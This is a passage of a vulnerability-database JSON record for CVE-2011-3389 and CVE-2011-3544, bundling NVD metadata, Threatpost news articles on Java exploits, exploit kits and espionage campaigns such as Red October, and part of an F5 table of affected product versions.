"2018-10-13T11:35:18", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14752", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3389"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14752", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:14752"}], "modified": "2018-10-12T18:01:28", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie", "cpe:/a:opera:opera_browser", "cpe:/a:google:chrome", "cpe:/a:mozilla:firefox"], "id": "CVE-2011-3389", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3389", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:04:27", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["http://support.apple.com/kb/HT5045", "http://www.apple.com/support/downloads/"], "description": "![Apple Java](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064741/java_patch_3.jpg)Apple pushed out a new batch of Java updates for Mac OS X 10.6.8 Snow Leopard and 10.7 Lion yesterday, bringing the two operating systems up to date with Oracle\u2019s Java SE 6 Update 29. \n\nIn its [update summary](<http://support.apple.com/kb/HT5045>), Apple claims multiple vulnerabilities exist in Java\u2019s previous build 1.6.0_26, including one that could allow an untrusted applet to execute arbitrary code outside the platform\u2019s sandbox. Another could bring about arbitrary code execution when it comes to the user\u2019s privileges. \n\nThe update to version 1.6.0_29 fixes 17 flaws in total including:\n\n * CVE-2011-3389\n * CVE-2011-3521\n * CVE-2011-3544\n * CVE-2011-3545\n * CVE-2011-3546\n * CVE-2011-3547\n * CVE-2011-3548\n * CVE-2011-3549\n * CVE-2011-3551\n * CVE-2011-3552\n * CVE-2011-3553\n * CVE-2011-3554\n * CVE-2011-3556\n * CVE-2011-3557\n * CVE-2011-3558\n * CVE-2011-3560\n * CVE-2011-3561\n\nAs usual, the update can be downloaded via your computer\u2019s Software Update preferences or from [Apple\u2019s Downloads](<http://www.apple.com/support/downloads/>) page.\n", "reporter": "Chris Brook", "published": "2011-11-09T17:09:04", "type": "threatpost", "title": "Apple Releases New Java Updates, Fix 17 Flaws", "enchantments": {"score": {"modified": "2018-10-06T23:04:27", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3389", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3545", "CVE-2011-3546", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3558", "CVE-2011-3560", "CVE-2011-3561"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:33:23", "id": "THREATPOST:163A6E502D29C451AA1A20E62CA10C1C", "href": "https://threatpost.com/apple-releases-new-java-updates-fix-17-flaws-110911/75873/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/exploit-kits-now-updated-new-wares-patches-are-ready-122011/", "http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/", "http://schierlm.users.sourceforge.net/CVE-2011-3544.html"], "description": "[![Exploit kit](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064929/exploit_kit.jpg)](<https://threatpost.com/exploit-kits-now-updated-new-wares-patches-are-ready-122011/>)The creators and maintainers of exploit kits often rely on public reports of new exploits and proof-of-concept exploit code in order to be able to add new exploits to their software. And in many cases, the exploits included in kits such as Black Hole and Eleonore and others will be for vulnerabilities that are older and have long since been patched. But, if recent events are any indication, that could be changing.\n\nIn mid-October, details of a new Java vulnerability emerged in various places, and descriptions of the flaw showed it to be a serious one that could lead to remote code execution. The CVE-2011-3544 vulnerability, though serious, was just one of many that had been found in various Java components in recent months, and there already were plenty of others in the exploit kits that were being used in attacks.\n\nBut within a few weeks of the details of the new Java bug becoming public, exploits for the flaw began showing up in some of the popular exploit kits, including Black Hole and Phoenix. Researchers say they began seeing new versions of the kits, which included the exploit for CVE-2011-3544, in the last few weeks, even before a patch was available. That\u2019s a somewhat unusual occurrence in exploit-kit land.\n\n\u201cThe Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited. A few days later, a new version of Phoenix exploit kit 3.0 was released, just a few weeks after the release of its predecessor, Phoenix 2.9,\u201d [Daniel Chechik of M86 Labs](<http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/>) wrote in an analysis of the exploits.\n\n\u201cA few weeks ago Michael \u2018mihi\u2019 Schierl [described a design error in Java.](<http://schierlm.users.sourceforge.net/CVE-2011-3544.html>) Basically this vulnerability is similar to other Java vulnerabilities where an untrusted code is executed in elevated privileges. Rhino is a Javascript engine that runs under the JVM and can interact with Java applets. An attacker can bypass the scripting engine protection by generating an error object, using Rhino script, which runs in elevated privileges and executing code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.\u201d\n\nOne of the reasons that the authors of the exploit kits may have been so quick to add the exploit for CVE-2011-3544 to their creations is that the vulnerability affects all of the platforms on which Java is supported, Chechik said in his analysis.\n\n\u201cThe vulnerability is cross-platform and doesn\u2019t require heap spray or buffer overflow techniques. That makes it very effective and therefore authors of exploit kits rushed to add it to their kits,\u201d he wrote.\n", "reporter": "Dennis Fisher", "published": "2011-12-20T13:09:34", "type": "threatpost", "title": "Exploit Kits Now Updated With New Wares Before Patches Are Ready", "enchantments": {"score": {"modified": "2018-10-06T23:04:09", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:33:08", "id": "THREATPOST:55470B21C54A7A60E26BD5F62A9DA72E", "href": "https://threatpost.com/exploit-kits-now-updated-new-wares-patches-are-ready-122011/76015/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:07", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["http://www.barracudalabs.com/wordpress/index.php/2011/12/22/authoritarian-regime-uses-human-rights-group-to-spy-on-activists/", "https://threatpost.com/java-still-favorite-target-attackers-113011/", "https://threatpost.com/apple-releases-new-java-updates-fix-17-flaws-110911/", "http://www.zdnet.com/blog/security/amnesty-international-uk-compromised-serving-exploits-and-malware/9861?utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29"], "description": "Amnesty International\u2019s United Kingdom website was compromised late last week and was being used to exploit a known Java runtime environment hole on machines belonging to unwitting visitors to the site, according to [Barracuda Labs](<http://www.barracudalabs.com/wordpress/index.php/2011/12/22/authoritarian-regime-uses-human-rights-group-to-spy-on-activists/>) researcher, Paul Royal.\n\nCiting historical data, Royal claims that AI\u2019s website was compromised on Friday, December 16, and remained compromised through December 22. Those who visited AI\u2019s UK page were redirected to a legitimate but compromised Brazilian automotive site via an iframe, which then installed malicious [Java](<https://threatpost.com/java-still-favorite-target-attackers-113011/>) content, Barracuda said. The exploit targeted a known vulnerability identified by the handle [CVE-2011-3544](<https://threatpost.com/apple-releases-new-java-updates-fix-17-flaws-110911/>).\n\nWhile the parties behind the attack are unknown, the decision to target a prominent human rights group like Amnesty may suggest that the attackers have other than financial motivations.\n\nAccording to Royal, the payload used in the attack is sophisticated enough to suggest that the hack was a targeted malware attack \u2013 though one being served through the exploitation of a popular public website. \n\nAmnesty said they were aware of the problem and were working to address it.\n\n\u201cWe have been working with our hosting service to resolve the problem,\u201d Emerson Povey of Amnesty International told [ZDNet\u2019s](<http://www.zdnet.com/blog/security/amnesty-international-uk-compromised-serving-exploits-and-malware/9861?utm_source=twitterfeed&utm_medium=twitter&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29>) Dancho Danchev. \u201c[We] have cleaned both servers, rebooted, and removed the script. At 2pm today [we] confirmed that the issue is now resolved.\u201d\n", "reporter": "Brian Donohue", "published": "2011-12-23T17:09:38", "type": "threatpost", "title": "In Possible Targeted Attack, Amnesty International Web Site Found Serving Malware", "enchantments": {"score": {"modified": "2018-10-06T23:04:07", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T20:05:46", "id": "THREATPOST:2B81FBABAC1CD81763117B31FE8F5E09", "href": "https://threatpost.com/possible-targeted-attack-amnesty-international-web-site-found-serving-malware-122311/76029/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:30", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/", "http://www.alienvault.com/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544", "http://labs.alienvault.com/labs/index.php/2012/alienvault-research-used-as-lure-in-targeted-attacks/", "http://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-746.html", "https://threatpost.com/symantec-traces-attacks-chemical-industry-20-year-old-chinese-hacker-hire-110111/", "http://en.wikipedia.org/wiki/Kalachakra", "https://threatpost.com/poison-ivy-rat-still-giving-users-rash-110311/", "https://threatpost.com/symantec-traces-attacks-chemical-industry-20-year-old-chinese-hacker-hire-110111/"], "description": "[![Mac trojan](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065351/mac_trojan_2.jpg)](<https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/>)The security firm Alienvault reports that its own research on phishing attacks against non governmental organizations supporting the Tibetan Government in Exile is now being used as bait in a new round of phishing attacks on those same NGOs.\n\nThe [firm](<http://www.alienvault.com/>) warned the public on Monday about a round of spear phishing e-mails being sent to NGOs related to Tibet. The e-mails mentioned previous research by the company on targeted attacks against Tibetan organizations. The phishing e-mails contain malicious links and attachments, including a new variant of a malicious program that can infect systems running Apple\u2019s Mac OS X operating system, Alien Vault warned.\n\nAlien Vault researcher Greg Walton wrote in a blog post that the company had detected e-mails sent to NGOs involved with work on Tibet on Monday with the subject \u201cTargeted attacks against Tibet organizations.\u201d Those e-mails contained malicious attachments, including Java applet\u2019s that [exploit a common vulnerability in the Java Runtime Environment](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>). \n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065348/phishemail.png)\n\nThe attack used malware both for Windows and MacOSX devices, according to AlienVault researchers. The MacOSX Trojan used is believed to be a variant of the GhostNet family and was undetectable by antivirus products as of Monday, [according to a post by AlienVault\u2019s Jaime Blasco](<http://labs.alienvault.com/labs/index.php/2012/alienvault-research-used-as-lure-in-targeted-attacks/>).\n\nThis isn\u2019t the first time that the Tibetan Government in Exile and organizations supporting the Tibetan cause have been targeted. In 2009, researchers in Canada and the UK raised the alarm about a widespread and long standing espionage campaign, dubbed GhostNet, against governments, human rights organizations and others. That campaign [included malware-based surveillance of the Tibetan Government in Exile and Free Tibet movement](<http://www.cl.cam.ac.uk/techreports/UCAM-CL-TR-746.html>). Though no government has taken claim for the spying, most fingers point to the government of China, which closely monitors the doings of the Dalai Lama and the Tibetan Government in Exile.\n\nIn a report on March 13, AlienVault\u2019s Blasco said that the company detected several targeted attacks against Tibetan activist organizations including the Central Tibet Administration and International Campaign for Tibet, among others. \nResearchers there believe that the attacks originated with the same group of Chinese hackers [that launched the \u2018Nitro\u2019 attacks against chemical and defense companies late last year](<https://threatpost.com/symantec-traces-attacks-chemical-industry-20-year-old-chinese-hacker-hire-110111/>) \u2013 an intriguing link between industrial and political espionage that would seem to suggest government backing.\n\nAccording to AlienVault, the attacks in mid-March began with a spear phishing campaign related to the [Kalachakra Initiation](<http://en.wikipedia.org/wiki/Kalachakra>), a Tibetan religious festival that took place in early January. The phishing e-mails contained a contaminated Office file to exploit a known vulnerability in Microsoft. The malware that was ultimately installed on the machines of those who fell for the attack was a variant of the Gh0st RAT (remote access Trojan).\n\nThat malware, along with [Poison Ivy remote administration tool](<https://threatpost.com/poison-ivy-rat-still-giving-users-rash-110311/>) is a common element in GhostNet attacks. In fact, Gh0st RAT was the same malware used in the [Nitro attacks last year against energy and chemical industry firms](<https://threatpost.com/symantec-traces-attacks-chemical-industry-20-year-old-chinese-hacker-hire-110111/>). Other variants of it were used in the GhostNet attacks on governments, diplomatic missions and the private offices of the Dalai Lama in 2009. AlienVault claims that the variant it captured in the Tibetan attacks appeared to come from the same actors. \n", "reporter": "Paul Roberts", "published": "2012-03-21T18:31:56", "type": "threatpost", "title": "New Trojan For Mac Used In Attacks On Tibetan NGOs", "enchantments": {"score": {"modified": "2018-10-06T23:03:30", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:32:35", "id": "THREATPOST:6A4F6EEA873DF0849F350B8C784B4AF3", "href": "https://threatpost.com/new-trojan-mac-used-attacks-tibetan-ngos-032112/76352/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:19", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/new-java-vulnerability-coming-bundled-exploit-kits-112811/", "http://krebsonsecurity.com/2011/11/new-java-attack-rolled-into-exploit-kits/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3544", "https://threatpost.com/oracle-release-56-patches-plus-20-more-java-october-cpu-101811/", "https://threatpost.com/apple-ships-java-patches-says-it-may-drop-java-future-os-x-releases-102110/", "https://threatpost.com/black-hole-exploit-kit-available-free-052311/", "http://krebsonsecurity.com/2011/11/new-java-attack-rolled-into-exploit-kits/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KrebsOnSecurity+%28Krebs+on+Security%29"], "description": "[![Java flaw](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064827/java_bug2.jpg)](<https://threatpost.com/new-java-vulnerability-coming-bundled-exploit-kits-112811/>)A recently discovered Java vulnerability that\u2019s been circulating throughout the hacking underground has begun to show up alongside the BlackHole exploit kit, according to a post on Brian Krebs\u2019 [KrebsonSecurity blog](<http://krebsonsecurity.com/2011/11/new-java-attack-rolled-into-exploit-kits/>).\n\n[The National Vulnerability Database](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3544>) claims the vulnerability is found in the Java Runtime Environment Component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier builds. Specifically, a weakness in Java\u2019s Rhino Script Engine allows attackers to run arbitrary Java code outside of the sandbox. Those with the latest version of Java, Java 6 Update 29, or Java 7 Update 1, are not affected. \n\nAccording to an interview Krebs had with the hacker that maintains the BlackHole kit, the Java exploit is now being distributed free-of-charge to existing exploit kit owners. Otherwise it\u2019s being sold for $4,000, in addition to a license for the kit, which normally runs for $700 for three months.\n\nEven after being [patched in mid-October](<https://threatpost.com/oracle-release-56-patches-plus-20-more-java-october-cpu-101811/>) along with 19 other script engine flaws, the vulnerability has become trickier to deal with when packaged with an exploit kit like BlackHole. Stumbling upon a vulnerability-laden site on Internet Explorer or Mozilla Firefox could trigger the installation of malware if users are running an out-of-date build of the software.\n\nJava vulnerabilities continue to gain steam, even [surpassing Adobe last year](<https://threatpost.com/apple-ships-java-patches-says-it-may-drop-java-future-os-x-releases-102110/>) when it comes to the number of exploits. [BlackHole](<https://threatpost.com/black-hole-exploit-kit-available-free-052311/>), one of the newer and more popular exploit kits this year, makes extensive use of Java flaws. The platform\u2019s OBE (Open Business Engine) frequently uses them to load malicious executables.\n\nTo read Krebs\u2019 full account, [head here](<http://krebsonsecurity.com/2011/11/new-java-attack-rolled-into-exploit-kits/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KrebsOnSecurity+%28Krebs+on+Security%29>).\n", "reporter": "Chris Brook", "published": "2011-11-28T16:39:33", "type": "threatpost", "title": "New Java Vulnerability Coming Bundled With Exploit Kits", "enchantments": {"score": {"modified": "2018-10-06T23:04:19", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:33:17", "id": "THREATPOST:373FC4769018499B9C1C7664F205F190", "href": "https://threatpost.com/new-java-vulnerability-coming-bundled-exploit-kits-112811/75931/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544", "https://threatpost.com/java-exploit-linked-red-october-espionage-malware-campaign-011513/", "http://www.securelist.com/en/analysis/204792262/Red_October_Diplomatic_Cyber_Attacks_Investigation", "http://blog.seculert.com/2013/01/operation-red-october-java-angle.html"], "description": "Red October, the espionage campaign uncovered by Kaspersky Lab this week after attackers spent five years actively spying on diplomats, scientists, and governments worldwide, is using a Java exploit to infect its victims, bringing the exploit count to four in this campaign.\n\nSeculert, an Israeli security company, said today it has investigated one of the command and control servers in the [Red October infrastructure](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) and found a website serving an exploit targeting [CVE-2011-3544](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544>). The vulnerability is in Java 7 and 6 u27 and earlier. According to the CVE alert, the flaw allows remote untrusted Java Web Start applications and untrusted applets to execute malicious scripts. Oracle patched the vulnerability in October 2011.[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073349/java_target_2.jpg)](<https://threatpost.com/java-exploit-linked-red-october-espionage-malware-campaign-011513/>)\n\nKaspersky Lab had previously identified [three Red October exploits](<http://www.securelist.com/en/analysis/204792262/Red_October_Diplomatic_Cyber_Attacks_Investigation>), all of them malicious Excel or Word documents attached to spear phishing emails. The company was alerted to the spear phishing campaign by an unidentified partner, which led them to Red October. Researchers found several hundred infections and initially identified the three exploits and upwards of 1,000 unique malware files in 30 different categories including reconnaissance, data collection, code execution, credential harvesting and more. The exploits targeted mobile devices, workstations and removable storage drives.\n\nKaspersky found 60 domains in the C&C infrastructure and server hosts mainly in Germany and Russia that act as proxies hiding the true C&C server. It was able to sinkhole a half-dozen of the C&C servers and observed 55,000 connections since Nov. 2 from close to 250 IP addresses in 39 countries.\n\nAviv Raff, CTO and cofounder of Seculert, said the Java-based attacks used in the campaign also relied on spear phishing emails, these containing a link to a malicious webpage, purporting to be a news site, coded in PHP that would exploit the Java flaw downloading malware quietly in the background. Raff said the exploit\u2019s JAR file was compiled in February, three months after the patch was released.\n\nRaff said the attackers have since moved from PHP to CGI as their C&C scripting engine.\n\n\u201cUnfortunately for the attackers, after moving their server-side engine to CGI, accessing the PHP exploit web pages now displays the source code of the server side, instead of rendering the exploit,\u201d Raff wrote in a [blogpost](<http://blog.seculert.com/2013/01/operation-red-october-java-angle.html>). \u201cThis allowed us to take a sneak peak to the behind the scenes of their operation.\u201d\n\nRaff was able to examine the exploit\u2019s source code and determined the malware payload URL is encoded before it is passed to the malicious applet and is decoded only when the exploit is executed. Raff said the all of the victim\u2019s information is logged.\n\n\u201cWe can see that the attackers are adding a fingerprint at the end of the malware executable, which includes the unique identifier of the targeted victim,\u201d Raff said. \u201cThis is the same unique identifier which is used by the malware later on while communicating with the [command and control] servers.\u201d\n\nKaspersky said each successful attack is customized for the victim based on the information collected by the malware on system configuration and more; activity is carefully managed and organized by the attackers.\n\n\u201cAll the attacks are carefully tuned to the specifics of the victims,\u201d said Kurt Baumgartner, senior security researcher at Kaspersky. \u201cFor instance, the initial documents are customized to make them more appealing and every single module is specifically compiled for the victim with a unique victim ID inside.\u201d\n\n\u201cLater, there is a high degree of interaction between the attackers and the victim \u2013 the operation is driven by the kind of configuration the victim has, which type of documents the use, installed software, native language and so on,\u201d Baumgartner said. \u201cCompared to Flame and Gauss, which are highly automated cyberespionage campaigns, Rocra is a lot more personal and finely tuned for the victims.\u201d\n\nKaspersky researchers were unwilling to link Red October, also known as Rocra, to Flame and other such espionage malware campaigns. Red October could be a copycat; some Flame exploit sites also were news themed and had the same \u201cNewsForYou\u201d server side control handler, Raff said.\n\nThe campaign targets not only Office documents, email messages and a long list of document types including the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n\u201cThe main purpose of the operation appears to be the gathering of classified information and geopolitical intelligence, although it seems that the information gathering scope is quite wide,\u201d the Kaspersky report said. \u201cDuring the past five years, the attackers collected information from hundreds of high profile victims although it\u2019s unknown how the information was used. It is possible that the information was sold on the black market, or used directly.\u201d\n", "reporter": "Michael Mimoso", "published": "2013-01-15T17:40:04", "type": "threatpost", "title": "Java Exploit Linked to Red October Espionage Malware Campaign", "enchantments": {"score": {"modified": "2018-10-06T23:01:36", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-05-10T14:34:43", "id": "THREATPOST:043252B422A8DE2AD45A1736D6792CA6", "href": "https://threatpost.com/java-exploit-linked-red-october-espionage-malware-campaign-011513/77405/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:22", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/rise-cross-platform-malware-082412/", "https://threatpost.com/crisis-trojan-makes-its-way-virtual-machines-082112/", "https://threatpost.com/new-java-malware-exploits-both-windows-and-mac-users-042412/", "https://blogs.technet.com/b/mmpc/archive/2012/08/23/the-role-of-agent-as-part-of-distribution-channel-decision.aspx?Redirected=true", "http://blogs.technet.com/b/mmpc/archive/2012/07/31/economies-of-scale-a-perspective-on-cross-platform-vulnerabilities.aspx", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3544"], "description": "[![Cross platform malware](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065951/crossplatform.jpg)](<https://threatpost.com/rise-cross-platform-malware-082412/>)For most of the recorded history of malware, viruses, Trojans and other malicious software have been specialists. Each piece of malware typically targeted one platform, be it Windows, OS X or now, one of the mobile platforms. But the last few months have seen the rise of cross-platform malware that have the ability to infect several different kinds of machines with small variations to their code.\n\nAttackers, like people in other walks of life, tend to specialize. They find something that they\u2019re good at, say, writing Windows rootkits or creating OS X Trojans, and they often will stick with that. There\u2019s not much reason to branch out if they\u2019re having success with something already. For a long time, most malware was written for Windows, because that\u2019s where most of the users are. Going after OS X or Linux didn\u2019t make a lot of sense.\n\nBut that\u2019s begun to change lately. One recent example is the [Crisis Trojan](<https://threatpost.com/crisis-trojan-makes-its-way-virtual-machines-082112/>), which has the ability to infect both Windows and Mac OS X machines. The first version of Crisis that researchers discovered targeted various versions of OS X, and it was a typical data-stealing Trojan, listening in on email and instant messenger communications. The interesting thing about Crisis is not only that there are versions for multiple platforms, but also that the installer for the malware, which masquerades as an Adobe Flash installer, checks to see what operating system it\u2019s on and then installs the appropriate version.\n\nThe malware also has a function that looks for VMWare images stored on the infected machine, and if it finds one, it will mount the image and then copy itself to the virtual machine image.\n\nResearchers found a similar piece of malware back in April. That one was [disguised as a Java applet](<https://threatpost.com/new-java-malware-exploits-both-windows-and-mac-users-042412/>) that would install different payloads depending upon what OS the target machine was running. So, attackers have decided that more is better when it comes to platforms. Why restrict your creation to just Windows or OS X when you can have both?\n\nMicrosoft researchers looked at a recent attack that involved a piece of malware using similar techniques and found that the attackers have been honing their skills.\n\n\u201cIn the case of a cross-platform offering, the attacker utilizes a _decision agent_ to recognize the appropriate package or software for its target. When the victim pulls pages or content from the attacker\u2019s distribution channel, an _agent_ (often referred to as the browser\u2019s user-agent) provides information, and a decision is made on behalf of the victim \u2013 that is, it automatically identifies the appropriate package or software without asking the user,\u201d Methusela Cebrian Ferrer of Microsoft\u2019s malware Protection Center wrote in an analysis of the techniques used by [cross-platform malware](<https://blogs.technet.com/b/mmpc/archive/2012/08/23/the-role-of-agent-as-part-of-distribution-channel-decision.aspx?Redirected=true>).\n\n\u201cHowever, in the [recent event described](<http://blogs.technet.com/b/mmpc/archive/2012/07/31/economies-of-scale-a-perspective-on-cross-platform-vulnerabilities.aspx> \"Economies of scale: A perspective on cross-platform vulnerabilities\" ), we observed that the delivery of malicious code through vulnerabilities in Java employs a decision _agent_ as part of a cross-platform attack. As shown in the timeline below, we first noticed this feature used in a Java vulnerability referred to as [CVE-2011-3544](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3544> \"CVE-2011-3544\" ). It was followed last month by the use of a Java Signed Applet attack \u2013 a form of social engineering where the user is lured to accept a signed Java applet and thereafter allows the attacker to run any payload.\u201d\n\nOne thing that\u2019s helping drive this trend is the existence of vulnerabilities in apps such as Java that are installed on several platforms, giving attackers the ability to use one vulnerability to get their malware on more than one platform. That\u2019s a key advantage for the attackers, and highlights the importance of keeping third-party apps patched and up to date.\n", "reporter": "Dennis Fisher", "published": "2012-08-24T14:57:16", "type": "threatpost", "title": "The Rise of Cross-Platform Malware", "enchantments": {"score": {"modified": "2018-10-06T23:02:22", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2011-3544"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2013-04-17T16:31:39", "id": "THREATPOST:21B00AEFB96A37C18FCE76AE3EE86E9F", "href": "https://threatpost.com/rise-cross-platform-malware-082412/76947/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2018-09-13T21:51:37", "references": [], "description": "\nF5 Product Development has assigned ID 368796 (BIG-IP and Enterprise Manager), ID 677660 (BIG-IQ), ID 677978 (F5 iWorkflow), ID 369724 (FirePass), and ID 376745 (ARX) to this vulnerability. To find out whether F5 has determined that your release is vulnerable, and to obtain information about releases or hotfixes that resolve the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 9.0.0 - 9.4.8 \n10.0.0 - 10.2.2 \n*10.2.3 - 10.2.4 \n*11.0.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP GTM | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.2 \n*10.2.3 - 10.2.4 \n*11.0.0 - 11.6.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP DNS | *12.0.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP ASM | 9.2.0 - 9.4.8 \n10.0.0 - 10.2.2 \n*10.2.3 - 10.2.4 \n*11.0.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP Link Controller | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.2 \n*10.2.3 - 10.2.4 \n*11.0.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP WebAccelerator | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.2 \n*10.2.3 - 10.2.4 \n*11.0.0 - 11.3.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP PSM | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.2 \n \n*10.2.3 - 10.2.4 \n*11.0.0 - 11.4.1 | None | Configuration utility \n \nSSL virtual servers \nBIG-IP WOM | 10.0.0 - 10.2.2 \n*10.2.3 - 10.2.4 \n*11.0.0 - 11.3.0 | None | Configuration utility \n \nSSL virtual servers \nBIG-IP APM | 10.1.0 - 10.2.2 \n*10.2.3 - 10.2.4 \n*11.0.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \n \nSSL virtual servers \nBIG-IP Edge Gateway | 10.1.0 - 10.2.2 \n \n*10.2.3 - 10.2.4 \n*11.0.0 - 11.3.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP Analytics | *11.0.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nBIG-IP AFM | *11.3.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nSSL virtual servers \nBIG-IP PEM | *11.3.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nSSL virtual servers 